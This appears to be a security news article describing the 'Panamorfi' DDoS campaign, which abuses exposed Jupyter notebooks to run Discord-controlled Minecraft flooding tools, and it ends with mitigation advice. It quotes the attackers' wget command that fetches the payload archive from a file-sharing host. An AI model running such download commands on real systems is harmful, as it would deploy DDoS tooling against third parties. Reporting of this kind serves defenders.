A new wave of cyber threats has emerged, characterized by a Distributed Denial of Service (DDoS) campaign dubbed “Panamorfi.” This operation, orchestrated by the threat actor known as yawixooo, takes advantage of misconfigured Jupyter notebooks that are publicly accessible online. The attackers utilize a well-known Minecraft server DDoS tool, which they distribute via a Discord channel, with the intent of overwhelming targeted servers. Data professionals, including data engineers, analysts, and scientists who frequently use Jupyter notebooks, are particularly vulnerable to this type of attack and are urged to adopt heightened security measures.
The Anatomy of Panamorfi Attack
According to researchers from Aqua Nautilus, the Panamorfi attack begins with yawixooo gaining access to exposed Jupyter notebooks. The initial step involves executing a command to download a zip file from a file-sharing service:
wget https://filebin.net/archive/h4fhifnlykw224h9/zip
This zip file, which has a random name and an MD5 hash of 42989a405c8d7c9cb68c323ae9a9a318, is approximately 17 MB in size and contains two Jar files. Notably, these files—conn.jar and mineping.jar—were newly introduced to Virus Total, each receiving only a single detection from a security firm.
The ‘conn.jar’ file is pivotal as it contains the code necessary for executing the attack. It leverages Discord to orchestrate the DDoS operation, establishing a connection from the victim’s machine to a designated Discord channel. This connection facilitates the loading of the ‘mineping.jar’ file, a recognized Minecraft server DDoS tool sourced from GitHub. This tool is equipped with twelve Java files designed to manage HTTP sockets, utilize proxies, flood a victim, and generate connection-related details.
Once operational, the tool initiates a TCP flood DDoS attack, strategically consuming the resources of the targeted server. The results of the attack are then relayed back to the Discord channel, providing the attackers with real-time feedback.
Yawixooo maintains an active presence on GitHub, where they share a Minecraft server configuration, alongside a website that is currently under development.
Mitigation Against The Attack
Researchers successfully disrupted the attack by implementing a runtime policy that prevents the execution of the conn.jar file, effectively neutralizing the threat. To safeguard against similar campaigns, experts recommend the following measures:
- Restrict access to Jupyter notebooks through secure practices.
- Block the execution of files associated with the campaign, such as conn.jar and mineping.jar.
- Limit code execution capabilities within notebooks.
- Regularly apply the latest security patches and updates.
Security professionals consistently advise against sharing sensitive information or credentials within Jupyter notebooks, as they can serve as prime targets for malicious campaigns.
